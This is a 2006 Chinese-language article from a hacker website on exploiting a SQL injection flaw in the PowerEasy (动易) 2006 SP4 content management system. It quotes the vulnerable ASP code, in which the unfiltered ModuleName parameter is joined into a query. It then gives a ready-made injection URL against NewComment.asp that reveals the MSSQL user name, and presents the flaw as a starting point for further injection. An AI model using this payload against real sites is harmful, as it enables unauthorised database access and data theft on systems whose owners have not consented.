|
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
|
|
||||||||
|
||||||||
|
|||||
| 动易2006SP4的漏洞利用 | |||||
作者:佚名 文章来源:网络 点击数: 更新时间:2006-10-25 ![]() |
|||||
|
今天BCT把动易SP4的漏洞公布了,既然都公布了,那么还是发出来吧! ModuleName = Trim(request("ModuleName")) 这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的SQL语句 If ModuleName <> "" Then 在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。)
If ChannelID <> 0 Then If ClassID <> 0 Then sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1 NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0-- 例如这样就可以暴mssql用户名省下的就是sql注入了 |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| Apple Mac OS X CoreGraphic phpwind任意修改管理员密码漏 安全杂谈:企业安全建设中的 PlayStation官方网站被注入恶 百度暴xssworm 跨站 漏洞 Flash漏洞最新疫情:一周感染 世界之窗等浏览器本地xss跨域 Mac OS X系统2008-004更新修 Ruby多个远程代码执行漏洞 IBM AFP查看器插件SRC存在属 |
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
| » CnXHacker.CoM | © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |